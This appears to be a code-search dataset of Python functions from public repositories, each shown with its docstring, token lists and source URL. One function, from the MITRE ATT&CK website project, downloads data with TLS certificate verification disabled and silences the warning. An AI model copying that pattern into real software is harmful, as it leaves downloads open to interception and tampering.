"f\"Element {elem!r} (attribute {attr!r}) not found\"",
")",
"else",
":",
"# custom element-attribute mapping, for fallback values",
"if",
"elem",
"in",
"opt_dict",
":",
"content",
"=",
"opt_dict",
"[",
"elem",
"]",
"self",
".",
"xml",
".",
"simpleElement",
"(",
"elem",
",",
"content",
")"
] |
https://github.com/biopython/biopython/blob/2dd97e71762af7b046d7f7f8a4f1e38db6b06c86/Bio/SearchIO/BlastIO/blast_xml.py#L784-L811
|
||
wikimedia/pywikibot
|
81a01ffaec7271bf5b4b170f85a80388420a4e78
|
pywikibot/page/__init__.py
|
python
|
BaseLink.__str__
|
(self)
|
return self.astext()
|
Return a str string representation.
|
Return a str string representation.
|
[
"Return",
"a",
"str",
"string",
"representation",
"."
] |
def __str__(self) -> str:
"""Return a str string representation."""
return self.astext()
|
[
"def",
"__str__",
"(",
"self",
")",
"->",
"str",
":",
"return",
"self",
".",
"astext",
"(",
")"
] |
https://github.com/wikimedia/pywikibot/blob/81a01ffaec7271bf5b4b170f85a80388420a4e78/pywikibot/page/__init__.py#L5210-L5212
|
|
mitre-attack/attack-website
|
446748b71f412f7125d596a5eae0869559c89f05
|
modules/util/stixhelpers.py
|
python
|
get_stix_memory_stores
|
()
|
return ms, srcs
|
This function reads the json files for each domain and creates a dict
that contains the memory stores for each domain.
|
This function reads the json files for each domain and creates a dict
that contains the memory stores for each domain.
|
[
"This",
"function",
"reads",
"the",
"json",
"files",
"for",
"each",
"domain",
"and",
"creates",
"a",
"dict",
"that",
"contains",
"the",
"memory",
"stores",
"for",
"each",
"domain",
"."
] |
def get_stix_memory_stores():
"""This function reads the json files for each domain and creates a dict
that contains the memory stores for each domain.
"""
# suppress InsecureRequestWarning: Unverified HTTPS request is being made
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ms = {}
srcs = []
# Set proxy
proxy = ""
if site_config.args.proxy:
proxy = site_config.args.proxy
proxyDict = {
"http" : proxy,
"https" : proxy
}
for domain in site_config.domains:
# Download json from http or https
if domain['location'].startswith("http"):
stix_json = requests.get(domain['location'], verify=False, proxies=proxyDict)
if stix_json.status_code == 200:
stix_json = stix_json.json()
ms[domain['name']] = stix2.MemoryStore(stix_data=stix_json['objects'])
elif stix_json.status_code == 404:
exit(f"\n{domain['location']} stix bundle was not found")
else:
exit(f"\n{domain['location']} stix bundle download was unsuccessful")
else:
if os.path.exists(domain['location']):
ms[domain['name']] = stix2.MemoryStore()
ms[domain['name']].load_from_file(domain['location'])
else:
exit(f"\n{domain['location']} local file does not exist. If you intended a URL, please include http:// or https://")
if not domain['deprecated']:
srcs.append(ms[domain['name']])
return ms, srcs
|
[
"def",
"get_stix_memory_stores",
"(",
")",
":",
"# suppress InsecureRequestWarning: Unverified HTTPS request is being made",
"urllib3",
".",
"disable_warnings",
"(",
"urllib3",
".",
"exceptions",
".",
"InsecureRequestWarning",
")",
"ms",
"=",
"{",
"}",
"srcs",
"=",
"[",
"]",
"# Set proxy",
"proxy",
"=",
"\"\"",
"if",
"site_config",
".",
"args",
".",
"proxy",
":",
"proxy",
"=",
"site_config",
".",
"args",
".",
"proxy",
"proxyDict",
"=",
"{",
"\"http\"",
":",
"proxy",
",",
"\"https\"",
":",
"proxy",
"}",
"for",
"domain",
"in",
"site_config",
".",
"domains",
":",
"# Download json from http or https",
"if",
"domain",
"[",
"'location'",
"]",
".",
"startswith",
"(",
"\"http\"",
")",
":",
"stix_json",
"=",
"requests",
".",
"get",
"(",
"domain",
"[",
"'location'",
"]",
",",
"verify",
"=",
"False",
",",
"proxies",
"=",
"proxyDict",
")",
"if",
"stix_json",
".",
"status_code",
"==",
"200",
":",
"stix_json",
"=",
"stix_json",
".",
"json",
"(",
")",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
"=",
"stix2",
".",
"MemoryStore",
"(",
"stix_data",
"=",
"stix_json",
"[",
"'objects'",
"]",
")",
"elif",
"stix_json",
".",
"status_code",
"==",
"404",
":",
"exit",
"(",
"f\"\\n{domain['location']} stix bundle was not found\"",
")",
"else",
":",
"exit",
"(",
"f\"\\n{domain['location']} stix bundle download was unsuccessful\"",
")",
"else",
":",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"domain",
"[",
"'location'",
"]",
")",
":",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
"=",
"stix2",
".",
"MemoryStore",
"(",
")",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
".",
"load_from_file",
"(",
"domain",
"[",
"'location'",
"]",
")",
"else",
":",
"exit",
"(",
"f\"\\n{domain['location']} local file does not exist. If you intended a URL, please include http:// or https://\"",
")",
"if",
"not",
"domain",
"[",
"'deprecated'",
"]",
":",
"srcs",
".",
"append",
"(",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
")",
"return",
"ms",
",",
"srcs"
] |
https://github.com/mitre-attack/attack-website/blob/446748b71f412f7125d596a5eae0869559c89f05/modules/util/stixhelpers.py#L374-L416
|
|
Staffjoy/suite
|
14ed49b21cf8296d2e0696a7f50f91f8e4b65072
|
staffjoy/resource.py
|
python
|
Resource._delay_for_ratelimits
|
(cls, start)
|
If request was shorter than max request time, delay
|
If request was shorter than max request time, delay
|
[
"If",
"request",
"was",
"shorter",
"than",
"max",
"request",
"time",
"delay"
] |
def _delay_for_ratelimits(cls, start):
"""If request was shorter than max request time, delay"""
stop = datetime.now()
duration_microseconds = (stop-start).microseconds
if duration_microseconds < cls.REQUEST_TIME_MICROSECONDS:
time.sleep((cls.REQUEST_TIME_MICROSECONDS - duration_microseconds) / MICROSECONDS_PER_SECOND)
|
[
"def",
"_delay_for_ratelimits",
"(",
"cls",
",",
"start",
")",
":",
"stop",
"=",
"datetime",
".",
"now",
"(",
")",
"duration_microseconds",
"=",
"(",
"stop",
"-",
"start",
")",
".",
"microseconds",
"if",
"duration_microseconds",
"<",
"cls",
".",
"REQUEST_TIME_MICROSECONDS",
":",
"time",
".",
"sleep",
"(",
"(",
"cls",
".",
"REQUEST_TIME_MICROSECONDS",
"-",
"duration_microseconds",
")",
"/",
"MICROSECONDS_PER_SECOND",
")"
] |
https://github.com/Staffjoy/suite/blob/14ed49b21cf8296d2e0696a7f50f91f8e4b65072/staffjoy/resource.py#L202-L207
|
||
saltstack/salt
|
fae5bc757ad0f1716483ce7ae180b451545c2058
|
salt/modules/netaddress.py
|
python
|
list_cidr_ips
|
(cidr)
|
return [str(ip) for ip in list(ips)]
|
Get a list of IP addresses from a CIDR.
CLI Example:
.. code-block:: bash
salt myminion netaddress.list_cidr_ips 192.168.0.0/20
|
Get a list of IP addresses from a CIDR.
|
[
"Get",
"a",
"list",
"of",
"IP",
"addresses",
"from",
"a",
"CIDR",
"."
] |
def list_cidr_ips(cidr):
"""
Get a list of IP addresses from a CIDR.
CLI Example:
.. code-block:: bash
salt myminion netaddress.list_cidr_ips 192.168.0.0/20
"""
ips = netaddr.IPNetwork(cidr)
return [str(ip) for ip in list(ips)]
|
[
"def",
"list_cidr_ips",
"(",
"cidr",
")",
":",
"ips",
"=",
"netaddr",
".",
"IPNetwork",
"(",
"cidr",
")",
"return",
"[",
"str",
"(",
"ip",
")",
"for",
"ip",
"in",
"list",
"(",
"ips",
")",
"]"
] |
https://github.com/saltstack/salt/blob/fae5bc757ad0f1716483ce7ae180b451545c2058/salt/modules/netaddress.py#L33-L44
|
|
CreatCodeBuild/TensorFlow-and-DeepLearning-Tutorial
|
b418e9dc381a908b9cb7a3038825b6eb276b98cd
|
Season1/4-6/load.py
|
python
|
normalize
|
(samples)
|
return a/128.0 - 1.0
|
并且灰度化: 从三色通道 -> 单色通道 省内存 + 加快训练速度
(R + G + B) / 3
将图片从 0 ~ 255 线性映射到 -1.0 ~ +1.0
@samples: numpy array
|
并且灰度化: 从三色通道 -> 单色通道 省内存 + 加快训练速度
(R + G + B) / 3
将图片从 0 ~ 255 线性映射到 -1.0 ~ +1.0
|
[
"并且灰度化",
":",
"从三色通道",
"-",
">",
"单色通道",
"省内存",
"+",
"加快训练速度",
"(",
"R",
"+",
"G",
"+",
"B",
")",
"/",
"3",
"将图片从",
"0",
"~",
"255",
"线性映射到",
"-",
"1",
".",
"0",
"~",
"+",
"1",
".",
"0"
] |
def normalize(samples):
'''
并且灰度化: 从三色通道 -> 单色通道 省内存 + 加快训练速度
(R + G + B) / 3
将图片从 0 ~ 255 线性映射到 -1.0 ~ +1.0
@samples: numpy array
'''
a = np.add.reduce(samples, keepdims=True, axis=3) # shape (图片数,图片高,图片宽,通道数)
a = a/3.0
return a/128.0 - 1.0
|
[
"def",
"normalize",
"(",
"samples",
")",
":",
"a",
"=",
"np",
".",
"add",
".",
"reduce",
"(",
"samples",
",",
"keepdims",
"=",
"True",
",",
"axis",
"=",
"3",
")",
"# shape (图片数,图片高,图片宽,通道数)",
"a",
"=",
"a",
"/",
"3.0",
"return",
"a",
"/",
"128.0",
"-",
"1.0"
] |
https://github.com/CreatCodeBuild/TensorFlow-and-DeepLearning-Tutorial/blob/b418e9dc381a908b9cb7a3038825b6eb276b98cd/Season1/4-6/load.py#L29-L38
|
|
jazzband/django-celery-monitor
|
2b86acddc4cf2e65b63c8c7b2db7ecaa037b4b75
|
django_celery_monitor/managers.py
|
python
|
TaskStateQuerySet.purge
|
(self)
|
Purge all expired task states.
|
Purge all expired task states.
|
[
"Purge",
"all",
"expired",
"task",
"states",
"."
] |
def purge(self):
"""Purge all expired task states."""
with transaction.atomic():
self.using(
router.db_for_write(self.model)
).filter(hidden=True).delete()
|
[
"def",
"purge",
"(",
"self",
")",
":",
"with",
"transaction",
".",
"atomic",
"(",
")",
":",
"self",
".",
"using",
"(",
"router",
".",
"db_for_write",
"(",
"self",
".",
"model",
")",
")",
".",
"filter",
"(",
"hidden",
"=",
"True",
")",
".",
"delete",
"(",
")"
] |
https://github.com/jazzband/django-celery-monitor/blob/2b86acddc4cf2e65b63c8c7b2db7ecaa037b4b75/django_celery_monitor/managers.py#L86-L91
|
||
yogeshbalaji/Generate_To_Adapt
|
622d4984662b71bcdb88c33c5ac67e6ec8bad0ad
|
models.py
|
python
|
_netF.forward
|
(self, input)
|
return output.view(-1, 2*self.ndf)
|
[] |
def forward(self, input):
output = self.feature(input)
return output.view(-1, 2*self.ndf)
|
[
"def",
"forward",
"(",
"self",
",",
"input",
")",
":",
"output",
"=",
"self",
".",
"feature",
"(",
"input",
")",
"return",
"output",
".",
"view",
"(",
"-",
"1",
",",
"2",
"*",
"self",
".",
"ndf",
")"
] |
https://github.com/yogeshbalaji/Generate_To_Adapt/blob/622d4984662b71bcdb88c33c5ac67e6ec8bad0ad/models.py#L113-L115
|
|||
Dan-in-CA/SIP
|
7d08d807d7730bff2b5eaaa57e743665c8b143a6
|
web/utils.py
|
python
|
group
|
(seq, size)
|
return (seq[i : i + size] for i in range(0, len(seq), size))
|
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
>>> list(group([1,2,3,4,5], 2))
[[1, 2], [3, 4], [5]]
|
Returns an iterator over a series of lists of length size from iterable.
|
[
"Returns",
"an",
"iterator",
"over",
"a",
"series",
"of",
"lists",
"of",
"length",
"size",
"from",
"iterable",
"."
] |
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
>>> list(group([1,2,3,4,5], 2))
[[1, 2], [3, 4], [5]]
"""
return (seq[i : i + size] for i in range(0, len(seq), size))
|
[
"def",
"group",
"(",
"seq",
",",
"size",
")",
":",
"return",
"(",
"seq",
"[",
"i",
":",
"i",
"+",
"size",
"]",
"for",
"i",
"in",
"range",
"(",
"0",
",",
"len",
"(",
"seq",
")",
",",
"size",
")",
")"
] |
https://github.com/Dan-in-CA/SIP/blob/7d08d807d7730bff2b5eaaa57e743665c8b143a6/web/utils.py#L586-L595
|
|
AIworx-Labs/chocolate
|
0ba4f6f0130eab851d32d5534241c8cac3f6666e
|
chocolate/connection/sqlite.py
|
python
|
SQLiteConnection.all_complementary
|
(self)
|
return list(db[self.complementary_table_name].all())
|
Get all entries of the complementary information table as a list.
The order is undefined.
|
Get all entries of the complementary information table as a list.
The order is undefined.
|
[
"Get",
"all",
"entries",
"of",
"the",
"complementary",
"information",
"table",
"as",
"a",
"list",
".",
"The",
"order",
"is",
"undefined",
"."
] |
def all_complementary(self):
"""Get all entries of the complementary information table as a list.
The order is undefined.
"""
gc.collect()
db = dataset.connect(self.url)
return list(db[self.complementary_table_name].all())
|
[
"def",
"all_complementary",
"(",
"self",
")",
":",
"gc",
".",
"collect",
"(",
")",
"db",
"=",
"dataset",
".",
"connect",
"(",
"self",
".",
"url",
")",
"return",
"list",
"(",
"db",
"[",
"self",
".",
"complementary_table_name",
"]",
".",
"all",
"(",
")",
")"
] |
https://github.com/AIworx-Labs/chocolate/blob/0ba4f6f0130eab851d32d5534241c8cac3f6666e/chocolate/connection/sqlite.py#L154-L160
|
|
psf/black
|
33e3bb1e4e326713f85749705179da2e31520670
|
src/black/files.py
|
python
|
find_project_root
|
(srcs: Sequence[str])
|
return directory, "file system root"
|
Return a directory containing .git, .hg, or pyproject.toml.
That directory will be a common parent of all files and directories
passed in `srcs`.
If no directory in the tree contains a marker that would specify it's the
project root, the root of the file system is returned.
Returns a two-tuple with the first element as the project root path and
the second element as a string describing the method by which the
project root was discovered.
|
Return a directory containing .git, .hg, or pyproject.toml.
|
[
"Return",
"a",
"directory",
"containing",
".",
"git",
".",
"hg",
"or",
"pyproject",
".",
"toml",
"."
] |
def find_project_root(srcs: Sequence[str]) -> Tuple[Path, str]:
"""Return a directory containing .git, .hg, or pyproject.toml.
That directory will be a common parent of all files and directories
passed in `srcs`.
If no directory in the tree contains a marker that would specify it's the
project root, the root of the file system is returned.
Returns a two-tuple with the first element as the project root path and
the second element as a string describing the method by which the
project root was discovered.
"""
if not srcs:
srcs = [str(Path.cwd().resolve())]
path_srcs = [Path(Path.cwd(), src).resolve() for src in srcs]
# A list of lists of parents for each 'src'. 'src' is included as a
# "parent" of itself if it is a directory
src_parents = [
list(path.parents) + ([path] if path.is_dir() else []) for path in path_srcs
]
common_base = max(
set.intersection(*(set(parents) for parents in src_parents)),
key=lambda path: path.parts,
)
for directory in (common_base, *common_base.parents):
if (directory / ".git").exists():
return directory, ".git directory"
if (directory / ".hg").is_dir():
return directory, ".hg directory"
if (directory / "pyproject.toml").is_file():
return directory, "pyproject.toml"
return directory, "file system root"
|
[
"def",
"find_project_root",
"(",
"srcs",
":",
"Sequence",
"[",
"str",
"]",
")",
"->",
"Tuple",
"[",
"Path",
",",
"str",
"]",
":",
"if",
"not",
"srcs",
":",
"srcs",
"=",
"[",
"str",
"(",
"Path",
".",
"cwd",
"(",
")",
".",
"resolve",
"(",
")",
")",
"]",
"path_srcs",
"=",
"[",
"Path",
"(",
"Path",
".",
"cwd",
"(",
")",
",",
"src",
")",
".",
"resolve",
"(",
")",
"for",
"src",
"in",
"srcs",
"]",
"# A list of lists of parents for each 'src'. 'src' is included as a",
"# \"parent\" of itself if it is a directory",
"src_parents",
"=",
"[",
"list",
"(",
"path",
".",
"parents",
")",
"+",
"(",
"[",
"path",
"]",
"if",
"path",
".",
"is_dir",
"(",
")",
"else",
"[",
"]",
")",
"for",
"path",
"in",
"path_srcs",
"]",
"common_base",
"=",
"max",
"(",
"set",
".",
"intersection",
"(",
"*",
"(",
"set",
"(",
"parents",
")",
"for",
"parents",
"in",
"src_parents",
")",
")",
",",
"key",
"=",
"lambda",
"path",
":",
"path",
".",
"parts",
",",
")",
"for",
"directory",
"in",
"(",
"common_base",
",",
"*",
"common_base",
".",
"parents",
")",
":",
"if",
"(",
"directory",
"/",
"\".git\"",
")",
".",
"exists",
"(",
")",
":",
"return",
"directory",
",",
"\".git directory\"",
"if",
"(",
"directory",
"/",
"\".hg\"",
")",
".",
"is_dir",
"(",
")",
":",
"return",
"directory",
",",
"\".hg directory\"",
"if",
"(",
"directory",
"/",
"\"pyproject.toml\"",
")",
".",
"is_file",
"(",
")",
":",
"return",
"directory",
",",
"\"pyproject.toml\"",
"return",
"directory",
",",
"\"file system root\""
] |
https://github.com/psf/black/blob/33e3bb1e4e326713f85749705179da2e31520670/src/black/files.py#L34-L73
|
|
jgagneastro/coffeegrindsize
|
22661ebd21831dba4cf32bfc6ba59fe3d49f879c
|
App/venv/lib/python3.7/site-packages/pkg_resources/_vendor/pyparsing.py
|
python
|
ParserElement.__rand__
|
(self, other )
|
return other & self
|
Implementation of & operator when left operand is not a C{L{ParserElement}}
|
Implementation of & operator when left operand is not a C{L{ParserElement}}
|
[
"Implementation",
"of",
"&",
"operator",
"when",
"left",
"operand",
"is",
"not",
"a",
"C",
"{",
"L",
"{",
"ParserElement",
"}}"
] |
def __rand__(self, other ):
"""
Implementation of & operator when left operand is not a C{L{ParserElement}}
"""
if isinstance( other, basestring ):
other = ParserElement._literalStringClass( other )
if not isinstance( other, ParserElement ):
warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
SyntaxWarning, stacklevel=2)
return None
return other & self
|
[
"def",
"__rand__",
"(",
"self",
",",
"other",
")",
":",
"if",
"isinstance",
"(",
"other",
",",
"basestring",
")",
":",
"other",
"=",
"ParserElement",
".",
"_literalStringClass",
"(",
"other",
")",
"if",
"not",
"isinstance",
"(",
"other",
",",
"ParserElement",
")",
":",
"warnings",
".",
"warn",
"(",
"\"Cannot combine element of type %s with ParserElement\"",
"%",
"type",
"(",
"other",
")",
",",
"SyntaxWarning",
",",
"stacklevel",
"=",
"2",
")",
"return",
"None",
"return",
"other",
"&",
"self"
] |
https://github.com/jgagneastro/coffeegrindsize/blob/22661ebd21831dba4cf32bfc6ba59fe3d49f879c/App/venv/lib/python3.7/site-packages/pkg_resources/_vendor/pyparsing.py#L2008-L2018
|
|
ansible/ansible
|
4676c08f188fb5dca98df61630c76dba1f0d2d77
|
lib/ansible/module_utils/distro/_distro.py
|
python
|
LinuxDistribution._parse_distro_release_file
|
(self, filepath)
|
Parse a distro release file.
Parameters:
* filepath: Path name of the distro release file.
Returns:
A dictionary containing all information items.
|
Parse a distro release file.
|
[
"Parse",
"a",
"distro",
"release",
"file",
"."
] |
def _parse_distro_release_file(self, filepath):
# type: (str) -> Dict[str, str]
"""
Parse a distro release file.
Parameters:
* filepath: Path name of the distro release file.
Returns:
A dictionary containing all information items.
"""
try:
with open(filepath) as fp:
# Only parse the first line. For instance, on SLES there
# are multiple lines. We don't want them...
return self._parse_distro_release_content(fp.readline())
except (OSError, IOError):
# Ignore not being able to read a specific, seemingly version
# related file.
# See https://github.com/python-distro/distro/issues/162
return {}
|
[
"def",
"_parse_distro_release_file",
"(",
"self",
",",
"filepath",
")",
":",
"# type: (str) -> Dict[str, str]",
"try",
":",
"with",
"open",
"(",
"filepath",
")",
"as",
"fp",
":",
"# Only parse the first line. For instance, on SLES there",
"# are multiple lines. We don't want them...",
"return",
"self",
".",
"_parse_distro_release_content",
"(",
"fp",
".",
"readline",
"(",
")",
")",
"except",
"(",
"OSError",
",",
"IOError",
")",
":",
"# Ignore not being able to read a specific, seemingly version",
"# related file.",
"# See https://github.com/python-distro/distro/issues/162",
"return",
"{",
"}"
] |
https://github.com/ansible/ansible/blob/4676c08f188fb5dca98df61630c76dba1f0d2d77/lib/ansible/module_utils/distro/_distro.py#L1346-L1367
|
||
thearn/Python-Arduino-Command-API
|
610171b3ae153542aca42d354fbb26c32027f38f
|
examples.py
|
python
|
softBlink
|
(led_pin, baud, port="")
|
Fades an LED off and on, using
Arduino's analogWrite (PWM) function
|
Fades an LED off and on, using
Arduino's analogWrite (PWM) function
|
[
"Fades",
"an",
"LED",
"off",
"and",
"on",
"using",
"Arduino",
"s",
"analogWrite",
"(",
"PWM",
")",
"function"
] |
def softBlink(led_pin, baud, port=""):
"""
Fades an LED off and on, using
Arduino's analogWrite (PWM) function
"""
board = Arduino(baud, port=port)
i = 0
while True:
i += 1
k = i % 510
if k % 5 == 0:
if k > 255:
k = 510 - k
board.analogWrite(led_pin, k)
|
[
"def",
"softBlink",
"(",
"led_pin",
",",
"baud",
",",
"port",
"=",
"\"\"",
")",
":",
"board",
"=",
"Arduino",
"(",
"baud",
",",
"port",
"=",
"port",
")",
"i",
"=",
"0",
"while",
"True",
":",
"i",
"+=",
"1",
"k",
"=",
"i",
"%",
"510",
"if",
"k",
"%",
"5",
"==",
"0",
":",
"if",
"k",
">",
"255",
":",
"k",
"=",
"510",
"-",
"k",
"board",
".",
"analogWrite",
"(",
"led_pin",
",",
"k",
")"
] |
https://github.com/thearn/Python-Arduino-Command-API/blob/610171b3ae153542aca42d354fbb26c32027f38f/examples.py#L21-L34
|
||
idapython/src
|
839d93ac969bc1a152982464907445bc0d18a1f8
|
pywraps/py_kernwin_askform.py
|
python
|
Form.SetFocusedField
|
(self, ctrl)
|
return _ida_kernwin.formchgcbfa_set_focused_field(self.p_fa, ctrl.id)
|
Set currently focused input field
@return: False - no such control
|
Set currently focused input field
|
[
"Set",
"currently",
"focused",
"input",
"field"
] |
def SetFocusedField(self, ctrl):
"""
Set currently focused input field
@return: False - no such control
"""
return _ida_kernwin.formchgcbfa_set_focused_field(self.p_fa, ctrl.id)
|
[
"def",
"SetFocusedField",
"(",
"self",
",",
"ctrl",
")",
":",
"return",
"_ida_kernwin",
".",
"formchgcbfa_set_focused_field",
"(",
"self",
".",
"p_fa",
",",
"ctrl",
".",
"id",
")"
] |
https://github.com/idapython/src/blob/839d93ac969bc1a152982464907445bc0d18a1f8/pywraps/py_kernwin_askform.py#L1269-L1274
|
|
home-assistant/core
|
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
|
homeassistant/components/rpi_camera/camera.py
|
python
|
RaspberryCamera.__init__
|
(self, device_info)
|
Initialize Raspberry Pi camera component.
|
Initialize Raspberry Pi camera component.
|
[
"Initialize",
"Raspberry",
"Pi",
"camera",
"component",
"."
] |
def __init__(self, device_info):
"""Initialize Raspberry Pi camera component."""
super().__init__()
self._name = device_info[CONF_NAME]
self._config = device_info
# Kill if there's raspistill instance
kill_raspistill()
cmd_args = [
"raspistill",
"--nopreview",
"-o",
device_info[CONF_FILE_PATH],
"-t",
"0",
"-w",
str(device_info[CONF_IMAGE_WIDTH]),
"-h",
str(device_info[CONF_IMAGE_HEIGHT]),
"-tl",
str(device_info[CONF_TIMELAPSE]),
"-q",
str(device_info[CONF_IMAGE_QUALITY]),
"-rot",
str(device_info[CONF_IMAGE_ROTATION]),
]
if device_info[CONF_HORIZONTAL_FLIP]:
cmd_args.append("-hf")
if device_info[CONF_VERTICAL_FLIP]:
cmd_args.append("-vf")
if device_info[CONF_OVERLAY_METADATA]:
cmd_args.append("-a")
cmd_args.append(str(device_info[CONF_OVERLAY_METADATA]))
if device_info[CONF_OVERLAY_TIMESTAMP]:
cmd_args.append("-a")
cmd_args.append("4")
cmd_args.append("-a")
cmd_args.append(str(device_info[CONF_OVERLAY_TIMESTAMP]))
# The raspistill process started below must run "forever" in
# the background until killed when Home Assistant is stopped.
# Therefore it must not be wrapped with "with", since that
# waits for the subprocess to exit before continuing.
subprocess.Popen( # pylint: disable=consider-using-with
cmd_args, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT
)
|
[
"def",
"__init__",
"(",
"self",
",",
"device_info",
")",
":",
"super",
"(",
")",
".",
"__init__",
"(",
")",
"self",
".",
"_name",
"=",
"device_info",
"[",
"CONF_NAME",
"]",
"self",
".",
"_config",
"=",
"device_info",
"# Kill if there's raspistill instance",
"kill_raspistill",
"(",
")",
"cmd_args",
"=",
"[",
"\"raspistill\"",
",",
"\"--nopreview\"",
",",
"\"-o\"",
",",
"device_info",
"[",
"CONF_FILE_PATH",
"]",
",",
"\"-t\"",
",",
"\"0\"",
",",
"\"-w\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_WIDTH",
"]",
")",
",",
"\"-h\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_HEIGHT",
"]",
")",
",",
"\"-tl\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_TIMELAPSE",
"]",
")",
",",
"\"-q\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_QUALITY",
"]",
")",
",",
"\"-rot\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_ROTATION",
"]",
")",
",",
"]",
"if",
"device_info",
"[",
"CONF_HORIZONTAL_FLIP",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-hf\"",
")",
"if",
"device_info",
"[",
"CONF_VERTICAL_FLIP",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-vf\"",
")",
"if",
"device_info",
"[",
"CONF_OVERLAY_METADATA",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-a\"",
")",
"cmd_args",
".",
"append",
"(",
"str",
"(",
"device_info",
"[",
"CONF_OVERLAY_METADATA",
"]",
")",
")",
"if",
"device_info",
"[",
"CONF_OVERLAY_TIMESTAMP",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-a\"",
")",
"cmd_args",
".",
"append",
"(",
"\"4\"",
")",
"cmd_args",
".",
"append",
"(",
"\"-a\"",
")",
"cmd_args",
".",
"append",
"(",
"str",
"(",
"device_info",
"[",
"CONF_OVERLAY_TIMESTAMP",
"]",
")",
")",
"# The raspistill process started below must run \"forever\" in",
"# the background until killed when Home Assistant is stopped.",
"# Therefore it must not be wrapped with \"with\", since that",
"# waits for the subprocess to exit before continuing.",
"subprocess",
".",
"Popen",
"(",
"# pylint: disable=consider-using-with",
"cmd_args",
",",
"stdout",
"=",
"subprocess",
".",
"DEVNULL",
",",
"stderr",
"=",
"subprocess",
".",
"STDOUT",
")"
] |
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/rpi_camera/camera.py#L86-L136
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.